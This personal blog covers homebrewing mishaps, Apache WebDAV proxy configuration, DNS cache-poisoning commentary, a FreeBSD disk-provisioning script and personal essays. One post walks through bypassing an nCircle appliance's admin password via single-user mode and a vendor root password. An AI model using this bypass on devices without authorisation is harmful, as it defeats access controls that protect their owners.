I should do about 18 lbs of grain (6 lbs more than what I had)

So, I exchanged the 10 gallon kettle for an 8 gallon, increased my recipe by 50%, and picked up a carboy + accessories for the extra beer (ha! err, nevermind ;-) Confident, I went back to the battle. (Although, I was shaking my head at how much money I spent in a couple hours...)

Repeat Lesson #3

Don't Start Brewing in the Evening

By all of the running around, it was almost 5 PM when I started. It gets dark here around 5 right now. Oh, and it's f-n cold outside right now in Minnesota. And icy. And I'm using a propane grill, so yeah. Here's a preview: I finished cleaning up at 12:30 AM.

Lesson #4 Seriously, wait until the next brew day

18 lbs of Grains, Srlsy?

I got the mash going and had the liquor tun warming up outside. Mash is a joke of a word. With the 1.5 q to pound ratio, I needed 6.75 quarts to the 18 pounds of grain. 6.75 gallons of water nearly filled the 8 gallon kettle. I guess 8 gallons meant to the lip-of-the-kettle-that-you-can't-move-else-scolding-off-a-finger. Oh, and putting then 18 pounds of grain into the kettle would have overfilled everything. I got the 18 lbs in by removing 1 gallon of water. My ration was now just about 1.25 quarts to pound.

This was stupid. I should have used less grain.

That water ratio isn't too bad, except that probably about a gallon of water was under the false bottom. So, the grain had a very, very doughy texture. It was so think that I had a 20 degree difference at the same level but on different sides. The thermo was ready less than 150. But, then I took a reading of 170. 170!! I cried, knowing I just destroyed a lot of the enzymes in that area. I had the heat relatively low at first, but turned it up when the thermo was falling.

I really wanted to act like a child and throw mash on the walls. Seriously, I did.

Lesson #Lost Count: DON'T USE 18 LBS IN A 8 GALLON KETTLE

Hurricane Burner Kicks Your Mom's Ass, With One Flame

This was also the first time I used my hurricane burner I got for turkey day (see how that works? ;-)

Well, I got a cool magic trick: make 4.5 gallons go down to 2. Oh, make 4.5 of the first runnings go down to 2.

Since it's outside and the windows now had a good amount of ice on them, I couldn't see the kettle overflowing. I reduced the heat, cursing. I then ended up losing more from the boil, because I kept my chiller in there (being sanitized) versus waiting until the last couple minutes. Another gallon disappeared...

Lesson #I hate lessons: Simmer down now

Miscellaneous

I didn't have enough hop bags for the two batches, so I had to reuse the old ones
I broke my hydrometer, and not even out of anger. A water lock cover got stuck in the tube with it and the hydrometer broke when I unsuccessfully tried to remove it
Having two batches to brew is greater than just adding 1 hour to your time
Do the dishes before brewing. Counter space and a lack of clutter really reduce stress

I finished cleaning at 12:30 AM or so. I did the dishes, mopped, put away almost everything, and then cleaned up. It was 1:30 by the time I got to bed, to only wake up at 6.

Final Lesson: I WILL SO ENJOY THIS BEER, REGARDLESS HOW CRAPPY IT TASTES! RELAX, AND HAVE A HOMEBREW

mod_proxy, mod_dav, Destination Header, and no fun

2008-11-10T08:10:00.008-06:00

So, I am transferring everything through a reverse proxy for the work's FreeBSD systems. Outside of an initial problem getting mod_proxy_html to work, everything was working great. That is, until WebDAV came into the picture.

We have two applications currently that use WebDAV: OmniFocus for syncing and Subversion. The prior OmniFocus WebDAV server was at our prior website service provider. That was the first one I started to move over.

I came across two problems with WebDAV. The first was with Digest authentication and the second was with the Destination header. I skipped around the Digest authentication issue by using standard Basic Auth. This isn't an issue, since everything is over TLS anyway. The problem I was having, though, was looking into the Authorization header and having to do an edit on the "uri" parameter. I'm very much a noob on mod_rewrite and wasn't getting anything working for me. Also, this was before I noticed the elegance of RequestHeader "edit" option.

The second issue also required a journey through mod_rewrite. I came across another poor soul's journey with the Destination header. I tried implementing the comment at the end, but with no success. That's when I noticed RequestHeader edit.

Here's the proxy setup for this host. For the example, the exposed / Internet URL is "https://www.example.com/omnifocus/" and the internal ServerName is "https://www.example.com/" and the internal server DNS name is www.int.example.com


# Rewrite Destination header for DAV to work
RequestHeader edit Destination ^https://www.example.com/ominfocus/ https://www.example.com/

ProxyPass /omnifocus/ https://www.int.example.com/
ProxyPassReverseCookiePath /  /omnifocus/
ProxyPassReverseCookieDomain .int.example.com .example.com

Location
        ProxyPassReverse https://www.int.example.com/
        RequestHeader unset  Accept-Encoding
        SetOutputFilter proxy-html
        ProxyHTMLExtended On
        ProxyHTMLURLMap / /omnifocus/
        ProxyHTMLURLMap https://www.int.example.com/ /omnifocus/
/Location

(FYI, I dunno why the Location elements are not showing up correctly. You'll have to encase the Location elements above with < and > )

Qualifications for President

2008-09-04T06:59:00.005-06:00

So, with each campaign tossing around who is and is not qualified to be the next U.S. President, let us refer to the one and only authoritative statement on who can or cannot be president:

No person except a natural born Citizen, or a Citizen of the United States, at the time of the Adoption of this Constitution, shall be eligible to the Office of President; neither shall any Person be eligible to that Office who shall not have attained to the Age of thirty-five Years, and been fourteen Years a Resident within the United States. -- Section 1 (paragraph 5) of Article II of the Constitution of the United States of America

That's it. Everything anyone else says about required qualifications is silly. They are only talking about what they would like to see (or what they have been told by others) in their candidate. There are no other required qualifications for U.S. President, outside of winning the Electoral College and getting voted in by the Senate, that is. If you think some qualification is a requirement, it isn't. Get over it.

Abraham Lincoln served a couple terms in state legislature for Illinois, one term in the U.S. House of Representatives, and was in his first term as a U.S. Senator when he ran for president. Oh, and he was an eloquent orator. But, by today's standards, he probably would not be labeled as not qualified, by the party he helped start. And, his eloquent speaking would be made fun of. Egads...

DNS Jabberwocky Part Two

2008-09-03T20:11:00.008-06:00

It took basically the club of Dan Kaminsky's last posting to finally clue me in to the severity and arms race present in the DNS cache poisoning attacks. I dunno if it was apathy towards the previous attacks that left me numb to the recent attack. Sure, it was nasty. But, see, Dan's a nice guy and he alerted those in the loop to the issue. So, see, everything got patched and we can walk away all warm and happy that the tubes won't melt down.

I even took part in the armchair criticism about Dan's 30 day moratorium on publicizing the issue. I still do think (albeit rightfully deserved) that the moratorium would help drive people to Black Hat and give Dan publicity that my cynical mind would translate to dollars (or euro, pounds, yen, blah) at some point. And with this apathy and cynicism in hand, I criticized in public and private on the actual impact of this issue. Chicken and egg; everyone that was anyone should have been patched, so there's no issue.

Except, there is...

What I failed to appreciate and now appreciate in full view is that Dan firstly saw the issue for what is was and secondly that source port randomization (SPR) is only a (currently) effective kludge. But, in basic form, it just changed a problem from a (2^16)/2 problem to at best a (2^48)/2 problem. The rub is, we still think in colloquial terms of a single host on a cable modem or DSL line perpetrating the attack. 2^47 packets is a lot to generate on one host; 2^16 isn't. Also, with spam, phishers and botnet herders working with their own economies of scale and resources, there's gold in dem there DNS cache hills. Take a bit over 100,000 hosts on a botnet and you reduce 2^47 now to 2^27. 2^27 isn't as good as 2^16, but it's pretty good. The attacks would seem to occur now in minutes and hours versus seconds and minutes. There is no patch; there just is a time trade-off and an arms race.

Dan put forth the currently debated fixes in his recent post. I won't be able to do them justice, so please just read about them on his post. He presented these four remedies:

DNSSEC
Layered Point Fixes
Attack Mode
Case Sensitive DNS Responses

He also touched on the "one character fix", but discredits its merit. Again, read his rebuttal.

What struck me about all of these, though, is that they are all implementation fixes (for the most part) versus design fixes. As in design fixes, DNSSEC was a design fix, but it's been distributed and available for a while. So, that puts it squarely into the implementation category. I concur with Dan; PKI is a hard implementation problems when scaling. I currently support a PKI infrastructure with about five servers and workstations and three individuals. That's easy. But, my PKI infrastructure doesn't scale, either. I couldn't imagine PKI amongst all of the DNS infrastructure. Heck, we don't even have it working for the web (think self-signed certs and expired certs).

The other remedies are also implementation fixes. Attack mode requires TCP. And, I apologize to Dan and all of the other DNS engineers out there by being one of security consultants that said to only enable 53/udp outbound. Yeah, I suck :-/

Dan seems to support the debouncing framework described in the Attack Mode section. Case Sensitive almost works for everything, but where it doesn't work, there are issues. (ibm.com wouldn't be happy to be left out in the cold.) So, there are no perfect solutions...

Or are there?

Since I'm not a DNS engineer, do not have to manage the authoritative servers under my technical control, nor actually have spent time reading the lists, I think I'm perfectly entitled to armchair quarterback for one more rush :-) Why can't we bump the DNS version number, increase the TXID / QID by some mathematically-sound value, patch, and call it a day? If the query doesn't ask for the new version, we stay w/ SPR. If it does, we send out a larger TXID. The patch would include some new header definitions, conditional statements, and possibly cause some interaction issues with any proxies that don't like the new sizes. But, seeing that Dan was able to promote +70% patch implementation in less than a month, I don't see my naive request being too naive. Let's say out of those 70% "early adopters", 50% are able to adopt the patch in 90 days, that's 35% of the DNS infrastructure that will not mathematically succumb to any attacks in the foreseeable future. Do we think we can implement DNSSEC across 1/3 of the DNS infrastructure in 90 days? Am I missing something here?

Maybe...

Dan had this very thoughtful statement at the bottom:

Not impossible, but not the sort of thing 16 engineers in a room could pragmatically hope to accomplish.

How Do Humans Stop Being Tools?

2008-07-28T19:17:00.004-06:00

(Yes, double entendre w/ the subject)

Inductive reasoning:

Induction or inductive reasoning, sometimes called inductive logic, is the process of reasoning in which the premises of an argument are believed to support the conclusion but do not entail it; i.e. they do not ensure its truth. Induction is a form of reasoning that makes generalizations based on individual instances.

Here is simple inductive reasoning applied. Given some app:

Authenticating to the app by entering valid credentials results in some X that is the same
Authenticating to the app by entering invalid credentials results in some X' that is noticeably different than the other set of X before
Therefore, if I guess credentials and receive X, I have authenticated to the app; vice-versa, I haven't

But, how does one "noticebly" measure the differences between X and X' to determine they are too different to be the same? This is what I want in a web application testing tool. This is also why humans still rule the world (and security market). I assume it's hard to automate such testing (not just the example above), excluding one-off scripts written for a single application, otherwise it would have been a commodity a while time ago.

Here's another example. Assuming the first vulnerability can be exploited via a CSRF, the results leak information that can be used possibly for another attack (if also a XSS attack existed in the CSRF attack). If the tool understood the API call and also understood that the "authenticity" token was related to authentication, it would at least have a chance.

How do we move tools away from exercises in combinatorics and more towards inductive reasoning?

DNS Jabberwocky

2008-07-23T21:34:00.005-06:00

(In the spirit of @Beaker and his wonderful DNS debacle poem, I offer this weak attempt at humor as a retort.)

The tubes have not suffered,
Or fallen, or swayed,
In light of nasty severity,
In how queries behaved.

Our egos, myself included,
Got our panties in a BIND,
On just another issue,
Affecting the Internet over time.

Mistakes have been made,
With all parties involved.
The Finder, the Knowers,
The Voyeurs and The Crowd.

First, with the Finder,
An honorable man, to be sure.
He should be proud with his find,
'Cause with it, security will ensure.

Though, he must be Steve Jobs,
Because of all the blogs and emails,
Created by his disclosure,
And then his purposeful lack of details.

A coincidence it not, though, be,
That 30 days of intermission,
Ends up more to his profit,
Versus a disclosure based on altruism

Then to correct, or to assuage,
The boos, the chaos, and the melee,
Please enter the Knowers,
One being a white sapote.

Now, with the Vendors, the Finders,
And the Knowers saying it was not pretty.
That made it said thrice,
Which most certainly made it be.

And then comes along
A Voyeur to the scene.
He made it known his thoughts
Which now makes it a 13-day.

But, a Knower leaked a bit,
His ego then put on display.
For a blog posting was already in tow,
More than a fortnight from disclosure day.

Back now to the other Voyeurs,
Which I am a part
The details we wanted to know
Deep down in our blackhat heart.

We are the same as race car fans,
Waiting for a crash
Instead of shock and horror,
We awe at the chaos and the flash.

Our egos are probably the worst,
For we are the partners to the dance.
It takes two to tango,
For this was not happenstance.

And in the wake and carnage,
Of the slayed DNS Jabberwocky
We hear from the Crowds
That this still is all sucky.

"Collateral damage be damned"
Quoth a noble Crowd ace.
But, truly, people now,
Let us not forgot our place.

Collateral damage, is usually
Measured in loss of life, home, or land
Only our caches will be poisoned
Which compared to other suffering, really isn't grand.

Sure, some may get rick-rolled,
Or worst and be pwned.
But take this with a grain of salt.
In the end, we'll still have our iPhone.

So let us all sit together,
Under the Tumtum tree
And chortle at what will be
The 2008 DNS Jabberwocky.

Unexpected Consequences

2008-04-26T09:59:00.005-06:00

Charity suffereth long, and is kind; charity envieth not; charity vaunteth not itself, is not puffed up, doth not behave itself unseemly, seeketh not her own, is not easily provoked, thinketh no evil - 1 Corinthians 13:4-5, KJV

Last night, I enjoyed much merriment at Arborfest in St. Paul. Wonderful beer was for sample, with so-so music and catering. I enjoyed at least a dozen sample glasses, sampling ten unique brews. Definitely a high mark in my new beer enjoyment expedition. And, soon, my RateBeer entries will detail for one and all my enjoyments. Last night, though, was also a reunion of sorts.

When I first met my love, I was a roommate of a geek I met about a decade ago at a 2600 meeting in Minneapolis. I moved in with him at an apartment in SE Mpls and then into his house in a northern Twin Cities suburb. Around this time was when I came out to one and all. And, around this time is when I met who would become my hubby, Adam. If we were all described as animals, Adam would be a Bird of Paradise. He is unique in appearance and also his heart. I, of course, fell for him immediately.

He stopped by one night at the roommate's house and we spent some time just chillin', if memory serves. As I went to bed by myself that night at the house, I could hear the owner talking things over with another roommate in the kitchen. The kitchen's air vent was also the same run as the vent in my room, so I could hear quite well all of the conversation. They started to degrade Adam for his appearance and persona. Their cavorting behind my back, but into my ears, lit a rage I never have felt in my life. I created fists so tight that my nails broke the skin. I cried. I hurt. And, I wanted to destroy.

I don't think my former roommate realized how close I was in destroying him, the other roommate, and if needed, myself that night. It was the first and only time I truly considered and accepted murdering another human.

I wanted so to destroy, but I wept. Eventually, I slept. I started moving out the next day.

I met this roommate last night at Arborfest, all by chance. Time has a way to heal, change, and age us, sometimes profound and sometimes unnoticeable. We greeted each other amicably enough. I more or less thought about how I could leave the situation. But, charity was at play. He apologized for his actions without my asking, moments after the informal greeting concluded.

And, in that moment, the rage, hatred, fear, and anger left me. I accepted and appreciated his apology. We got caught up with our lives. We talked and drank, and it was good.

I forgive him for his trespasses, and I hope he can forgive me for mine. When others ask me how to describe my religion or faith, I try to best describe myself as an atheist that has faith in man. I believe in mankind and the good that we can do. I also understand the evils that stir in our hearts and what each and every one of us is capable of. But, my faith is that over time, we progress towards what is good versus what can consume us as evil. And, last night, my faith received renewal.

Na zdrowie

MLT Day 1

2008-04-19T18:48:00.004-06:00

Progress! (inside joke for those that say The Piano Tuner). Seriously, though, I did start to slay the beast called Homebrew.

I got the spigot and accessories on after my all day extravaganza with one fucking washer. I then was able to size and cut the copper tubing. But, I did have to make one more run to Home Depot....

The tube bender I purchased was the incorrect tool to try and, um, cut corners with. Originally, the specs called for four 90 degree fittings. I had problems finding them at Home Depot and instead of asking, just left. I went to Ace Hardware and couldn't find them, either. But, I did find a nice tube bender by GB Electrical. It definitely was much more than the four corner fitters were.

I made a decent 90 degree bend, still containing optimism. But, that crashed after I tried to do an opposite 90 degree bend (imagine a "U"). And then, the tube kinked. I tried this again, and again kinked a good piece of tube. Realizing my failure, and since I needed to go to Home Depot anyway, I went looking for the fittings. I found them in like 1 minute... So, more stuff to return to Ace.

The reason I knew I had to go back to Home Depot was that the spigot fitting had a very, very minor leak. It was slightly moist to the touch. I applied some kitchen caulk to it, hoping that will take care of things. I'm thinking that if it does leak again, I'll get the newer 70 qt Coleman Xtreme cooler. The Xtreme cooler looks like it has a nice recess and lower fitting than my cooler.

To see more pics and updates, head on over to the Homebrew set.

Let Me Tell You About S/S Fender Washers...

2008-04-19T15:01:00.003-06:00

Yeah, I'm very knowledgeable about fender washers than any normal layman has to be, now. In a previous post, I decided to use someone else's method to convert my Coleman cooler into a mash-lauter tun (MLT). Between Ace Hardware and Home Depot, I was able to get a lot of the raw materials and then some. But, neither spot had the single, stainless steal 3/4" fender washer that the steps called for. And, since I knew this was for the side that was going to be dealing with the mash, I didn't want rust or anything unusual to happen. So, we start the quest for a 3/4" S/S fender washer...

There's a spot near here called Beisswenger's in New Brighton. They, like Ace, carry the same type of fasteners. I also looked into Fastenal, but unfortunately, I did not plan well. They're mostly only open Monday-Friday. Being today is Saturday and today I shall conquer this damn MLT, I found at Beisswenger's S/S fenders. Unfortunately, they only carried up to 1/2" size. Well, shucks, how hard can it be to bore it out to 3/4", eh?!

FUCKING HARD!

I spent about 3 hours today (not including the many prior minutes to hours driving around and trying to source the damn thing) boring out this washer to 3/4". I really don't have a shop at home, so things like vice clamps don't exist. I do really want to have a shop much more, now. I used a 3/4" drill bit, a couple wood clamps, and a Dremel silicon carbine tip to get this thing going. The drill bit helped get it near 3/4". Since I didn't have a vice to really hold the washer, though, the bit would catch on it and torque it out of the clamps. Eventually, with the Dremel bit, I was able to get it at 3/4". But, to fit over the 1/2" ID brass nipple, I needed the diameter a bit more than 3/4".

I nearly cut myself using the bit so inappropriately on its side to bore out the damn washer. The Dremel battery needed to be recharged and was out of commission for a while... So, I took a break and watched King of Kong. When it was done, I gave it one last try w/ the Dremel and its bit. I got so close that I had to keep on going... And going... And going...

Until...

I kept on going... And going... And success!!! The damn washer actually fit around the nipple, woo hoo!! I let out a primal scream of success. I had conquered the washer, yah!

So, lessons of this saga:

Have the right tools on hand to do the job
Go online and buy a 3/4" S/S fender washer, regardless of the price
Enjoy it, this is for homebrew

The Life of Others

2008-04-16T18:07:00.002-06:00

I just view The Life of Others moments ago. Others consider me a sensitive guy (which coincidentally I am gay ;-) especially my husband. I earned this distinction since when I'm moved, I express myself in step. Extreme happiness or sadness, I bawl like a 4 month old wanting a bottle. I cried a lot while watching The Life of Others.

If you do get this, watch it by yourself. I guarantee you will become HGW XX/7. As a voyeur, you will feel the struggle of beauty versus procedure. Humanity can reside in the inhumane (or those that just happen to be good at being inhumane).

Amazing.

Beer Brewing, Part 2

2008-04-10T14:18:00.007-06:00

(Part 1 here)
Going to run to Northern Brewer, Hockenbergs, and Home Depot for some purchases. I got inspired to create my own counter-flow chiller from copper and garden hose. I haven't soldered anything since my early tech school days while I interned at Comtrol. I've never done copper, but I think it'll be pretty easy. I'll keep a list of stuff I bought and hopefully have a good blog entry or two!

K... Got back from Hockenbers and Home Depot. I didn't make it out to Northern Brewers. I picked up a bunch of stuff but not everything needed to convert the cooler. Home Depot did not have any 3/4" washers near the other washer; the highest they went up to was 5/8". I dunno if the extra 1/8" is needed or not, so I'm sticking to the specs.

Oh, I am recording in detail my shopping list. I'm not going for the cheapest deals online. I definitely like to walk around and buy stuff. Hopefully, though, someone in the future will find it useful! Also, I noticed Home Depot had their 50' copper refrigeration coil away from the straight 10' runs. They also had 10' runs. Reading up on the comments on the chiller, it seems that the 50' run slows things down a lot. But, I'm guessing 10' isn't enough, either. Oh, well, 50' it is...

... or maybe not. I've just read up on the Jamil whirlpool immersion chiller. Hmm, more research!

Howto Reset an nCircle Device Profiler admin Password

2008-04-09T14:38:00.009-06:00

I am currently deploying nCircle's IP360 product line for a client of mine. When I was working on the proof-of-concept, I had two device profilers (DPs) setup, using the infamous sticky note for my password (and Keychain). Well, once the item went into test, I changed my Keychain password and changed the password for one DP. Yesterday, I dusted off the other test DP for a local install and, um, yeah. I had no idea what the password was.

I am under a non-disclosure as it relates to nCircle's customer support knowledge base, so I cannot describe certain stuff. But, since none of this was in the knowledge base when I looked, I thought it would be good to document the procedure for others.

What you need to continue:

An nCircle DP ;-)
Knowledge-base access to nCircle's Support site
Ability to connect to the serial port (I use on my MacBook Pro the GUC232A USB adapter and MacPorts minicom port)

Step 1: Setup your serial port connection from your computer to the DP (not covered)
Step 2: Interrupt the loader to boot into single user mode
Step 3: Enter the root password and select the Bourne shell
Step 4: Start the rc script
Step 5: Mount / read-write
Step 6: Set your TERM variable and Edit /loader/loader.conf
Step 7: Blank out the password field
Step 8: Mount / read-only and reboot
Step 9: Done?

Step 2: Interrupt the loader to boot into single user mode

During the initial boot, you should see something like this (especially if you're using minicom):


Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Dec 28 2007, 09:43:51.

Press CTRL-A Z for help on special keys

/boot/kernel/kernel text=0x288dcc data=0x3cd84+0x26f64 syms=[0x4+0x3e1b0+0x4+0]/
-                                                                           
Hit [Enter] to boot immediately, or any other key for command prompt.       
Booting [/boot/kernel/kernel] in 9 seconds...

At this point, hit any key other than Enter or Space. Then you should see this:

                                                                            
Type '?' for a list of commands, 'help' for more detailed help.             
OK

From here, enter `boot -s` and hit enter. This will start the boot in single user mode. You should see something like this:


OK boot -s                                                                   
GDB: no debug ports present                                                  
KDB: debugger backends: ddb                                                  
KDB: current backend: ddb                                                    
Copyright (c) 1992-2005 The FreeBSD Project.                                 
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994     
      The Regents of the University of California. All rights reserved.    
FreeBSD 6.0-RELEASE #0: Wed Jun 21 20:29:12 PDT 2006                         
  root@build.eng.ncircle.com:/home/tnguyen/autobuild/appliance/flash/osdir/srE
ACPI APIC Table:                                      
Timecounter "i8254" frequency 1193182 Hz quality 0         
...

Step 3: Enter the root password and select the Bourne shell

Eventually, the kernel will load and you will be ready to start single user mode. nCircle has applied a root password to the system, so you'll need that before continuing.
Log into the support site and search (Find Solution) in the knowledge base for "shell". You should see a suggestion called "HowTo: Running a remote shell script via the IP360 GUI". Open that suggestion and find out the root password :-)
Now, the system should be asking you for the root password. Enter the root password and when prompted for a shell, enter /bin/sh. If you were successful, you should see something similar to below.


Trying to mount root from ufs:/dev/ad0s1a                                    
Enter root password, or ^D to go multi-user                                  
Password:                                                                    
Enter full pathname of shell or RETURN for /bin/sh: /bin/sh                  
#

Step 4: Start the rc script

This is easy. Just type `/bin/sh /etc/rc` and you should see something similar to below:


# /bin/sh /etc/rc                                                            
sysctl: oid 'vm.swap_enabled' is read only                                   
sysctl: oid 'vm.swap_idle_enabled' is read only                              
net.inet.tcp.keepidle: 7200000 -> 60000                                      
net.inet.tcp.keepintvl: 75000 -> 60000                                       
/dev/ad0s1a: 770 files, 10054 used, 20581 free (61 frags, 2565 blocks, 0.2% fra)                              
...

Step 5: Mount / read-write

Easy step, enter `/sbin/mount -w /`. There will be no output on a successful mount

Step 6: Set your TERM variable and Edit /loader/loader.conf

Enter `export TERM=vt100` to allow vi to know what's going on. I'm too lazy to write a sed one liner to do this. Feel free to leave one in the comments
Then, enter `/usr/bin/vi /loader/loader.conf` to open vi. If you have no idea how to use vi, GIMF

Step 7: Blank out the password field

Find the "password=craphere" field
Remove the craphere stuff, but leave the equal sign
Save and exit vi
(No, I don't know what they're using for encryption, but it does smell)

Step 8: Mount / read-only and reboot

Run `/sbin/mount -r /`
Run `/sbin/reboot`

Step 9: Done?

If everything worked, you should be at a "hostname>" prompt. If not, well, contact nCircle and don't tell them you did this! :-)

Beer Brewing, Part 1

2008-04-08T17:41:00.005-06:00

So, I'm diving into home brewing. I found a lot of good information in the book "The New Complete Joy of Home Brewing" by Charlie Papazian, the website HomeBrewTalk, and also a couple YouTube users. I've decided to start out with all grain brewing, using an infusion mash method and batch sparging. So, I'll be documenting the process here, whoop!

The first step will be converting my Coleman 48qt cooler into a mash-lauter tun (MLT). From there, it will be shopping around to get all the equipment and then eventually product. I'm going to attempt to stick to water, barley, hops, and yeast-only brewing and also just using gyle for my kräusening or to Spiesegabe. For some reason this overall approach seems like a cool challenge, but more so, an authentic way to brew some fine beer. Well, we'll see where it goes!

Malware and MD5, Finally a Possible Attack

2008-01-04T18:35:00.000-06:00

Creating MD5 collisions has been possible using arbitrary values. So, one could come up w/ a specific number and create another specific number, albeit slightly different. Both numbers, when used as an input to an MD5 hash program will report the same hash. The only practical attack I was aware of was using some type of active code to check which string was present in a file.

But, some smart cookies thought up of a better scheme that has an actual wider range of use. I didn't see the original thread right away, but here's a couple links to it:

The Reg
Symantec

Interesting attack. Still, no pre-image. And, this won't affect servers as much as it will affect desktop / laptop users. But, heck, it's cool nonetheless.

Favorite Recent Beers

2008-01-03T12:42:00.000-06:00

Trappists:

Orval: yummy but small
Koningshoeven Tripel
Tripel Karmeliet
Koningshoeven Quadrupel: Darker, stronger and more spice flavors on the end

Non-Trappists (Abbey Ales)

Delirium Tremens

Bad Servers and Credit Card Fraud

2008-01-02T18:53:00.001-06:00

So, I was at the New Calhoun Grill (Lake St. & Excelsior in So. Minneapolis, (612) 455-1250) New Year's Day for a late brunch. The wait wasn't bad, compared to Uptown Bar & Grill, from where we left seeing only a big wait. We were seated at 12:16 PM by a server named Adam at Table 21. (Note me putting down the time, bad sign.) My hubby ordered a strawberry malt, which can be annoying if you've ever served (I have), and some hot tea. I just had water. Twenty minutes later (I shit you not), we had the malt and the tea. The tea took over 10 minutes (hot water from the coffee machine, tea bags, cup). At that time (20 minutes into it), the server took our food order. 10 minutes later, the food was up. So, the cooks seemed to have their shit together, but not the server.

We finished in about 15 minutes or so, and had to wait another 15 minutes for the bill. By this time, though, the server already cleared all the plates. He didn't ask for a hot water refill. And, we were very much done. One hour later, we got out of there. Our meal was a #3 (eggs, toast, bacon, hashbrowns), a side of toast, and a side of sausage. Pretty freaking bad service.
.
I was gonna tip nothing, but my better half, being in the service industry too, understood the guy lived off of tips. He graciously tipped him $1 and so did I, for a $23.54 bill (tax included). It was a tip with a purpose.

So what did the asswipe do? Expecting shenanigans, I kept my receipt and checked my bank balance today. The fuck went ahead and modified the tip statement, adding another $3.00 to the total.

I'm pissed, because some lame server now got really lame by committing fraud. This is where emotion enters into law. I'm emotionally pissed, but the bank is going to correct it, so no biggie. I'm gonna talk to the manager of the restaurant and raise a stink, though. The guy's a thief. And, you can only trust a thief to steal from you...

<3

UPDATE:

Well, I spoke too soon and will eat crow. The server did a pre-auth, it seems, on the bill. Once it cleared the bank, the amount was correct. So, I rescind my former comments about Adam, his integrity, and any statements negative against the New Calhoun Grill.

Nice Vid: Stop the Clash of Civilizations

2007-05-26T09:15:00.001-06:00

Geneology Rules!

2007-04-04T09:48:00.000-06:00

I came across Ancestry.com yesterday and had some fun looking up relatives. While my family tree is currently not that deep (yeah for immigration!), others in my close family have traces back 5+ generations. It's really cool to see such depth and history.

Yeah for geneology!

This is just messed...

2007-04-02T18:48:00.000-06:00

http://www.cnn.com/2007/LAW/04/02/jogger.slain.ap/index.html

Apparently, a man was wrongfully convicted and incarcerated for two rapes that occurred in 1987.

First, the guy has been diagnosed with schizophrenia. Now, think about having a disorder that already makes you delusional and wrongly being accused and prosecuted for a crime... Think a bit more. I would guess this person will not, unfortunately, enjoy another day of his life without being up on a lot of drugs, having spent at least 1/4 of his life behind bars.

Second, the rape victims had a false sense of security all these years. They could have been raped again by the same assailant.

Third, the now accused rapist cannot even be prosecuted for the crime, let alone serve the time an exonerated man has served, since the statute of limitations was set at 5 years (dunno if it's longer nowadays or not).

So, here's my wild idea: if an individual is found wrongly accussed and prosecuted for a crime, where the perpetrator is found via strong evidence to be guilty, the perpetrator should serve all the time the exonerated person served in addition to the crime itself. It should be a crime to knowingly let someone else be found guilty for a crime that someone else committed. Additionally, a sentence in a crime has to be equal than or less to the length of the statute of limitations. This gets weird, since the exonerated guy was serving consecutive sentences because of multiple occurrences, serially. Really, though, it doesn't make sense to serve up to 35 years in prison, while the "freshness" of prosecution is only 5 years.

And it takes an exoneration for us to see this...

<3

Smoking the FreeBSD Crack (and other adventures with ports and packages) Part 4

2007-03-27T06:29:00.000-06:00

Part 3,Part 2, and Part 1 will, um, make this article actually make sense...

To recap:

--) PXE boot a client and have it load boot/pxeboot (done)
--) pxeboot loads a 6.2 kernel and NFS roots world (done)
--) /sbin/init happens to be missing from this world, but there's an install.cfg around :-o
--) install.cfg wipes the disks and lays out a partition scheme
--) install.cfg then installs a couple packages via NFS. The first package is the base system (versus using distribution stuff)

Those last three items..., yeah. Part 2 talked about how that just wasn't working for me. So, here's the new strategy:

--) /sbin/init is alive and well. In fact, it happily loads rc, which gets around to the /etc/rc.d and /usr/local/etc/rc.d directories
--) Put a simple rc.d script into the local directory that calls a script file (probably could just inline the whole thing)
--) The script file slices, labels, formats, mounts, adds the base package, cleans up, and shutdowns

/usr/local/etc/rc.d/foo:


#!/bin/sh
#
# PROVIDE: foo
# REQUIRE: LOGIN

. /etc/rc.subr

name="foo"
rcvar=`set_rcvar`
command="/usr/local/bin/foo"

load_rc_config $name
run_rc_command "$1"

/usr/local/bin/foo:


#!/bin/sh
echo
echo
echo
echo "Installing the shinizzle FreeBSDizzle Operating Syzzle"
echo
echo
echo
fdisk -f /fdisk.out da0
bsdlabel -R da0s1 /bsdlabel.out
newfs -b 16384 -f 2048 /dev/da0s1a
newfs -b 16384 -f 2048 -U /dev/da0s1d
export rootdir=/mnt
export spacedir=${rootdir}/space
mount /dev/da0s1a ${rootdir}
mkdir ${spacedir}
mount /dev/da0s1d ${spacedir}
export PKG_TMPDIR=${spacedir}
export PKG_DBDIR=${rootdir}/var/db/pkg
pkg_add -p ${rootdir} /packages/All/base_kern-6.2.r_2.tbz
umount ${spacedir}
cat > ${rootdir}/etc/fstab < < EOL
/dev/da0s1a     /       ufs rw  2 2
devfs   /dev    devfs rw        0 0
/dev/da0s1d     /space  ufs rw  2 2
EOL
echo
echo
echo
shutdown -p now

/fdisk.out:
# BTW, it's much easier to get these numbers from a running FreeBSD instance :-)


#cylinders=19330 heads=255 sectors/track=63 (16065 blks/cyl)
g       c19330  h255    s63
p       1       165     63      310536387
a       1

/bsdlabel.out:
# BTW, it's much easier to get these numbers from a running FreeBSD instance :-)


# /dev/da0s1:
8 partitions:
#        size   offset    fstype   [fsize bsize bps/cpg]
  a:  8388608        0    4.2BSD     2048 16384 28528 
  b:  4194304  8388608      swap                    
  d: 297953475 12582912    4.2BSD     2048 16384 28528

/etc/rc.conf:


foo_enable="yes"

These all are within the NFS-mounted FreeBSD Disk 1 ISO file for the respective arch. So, when pxeloader gets loader, and loader gets the kernel, and the kernel remounts root, this madness will be called during the LOGIN time of rc.d.

That's it.

;-)

Here's what's cool with this approach: any changes I make on the OS I can track via the /var/db/pkg framework. Also, it becomes pretty easy to look into /var/db/pkg for older versions and upgrade as needed. Right now, the src I built has patchlevel 3 applied (whoops! I thought it was 2, oh well!). When patchlevel four comes out, I can tell which ones need to be upgraded. Also, I can create packages for all the /etc and /usr/local/etc changes, pushing those out. If I standardize on using the one, make base_kern package, then to recover any system, I just need that package plus the subsequent changes. I'm getting happy just thinking about my system admin changes from being an O(N) operation to something much better. This idea also works well with jails. If I have twenty jails on the system, each with their own world, it becames easy to do a pkg_delete and pkg_add for the upgrade.

Unfortunately, the FreeBSD Update process wouldn't work well, until I have a box that can be only tasked with building. Reason being, it still requires fiddling with the date/time to find out about timestamp issues. So, I wouldn't be able to just push out a patch. Given that all these boxes are on local subnets and disk is cheap, no biggy.

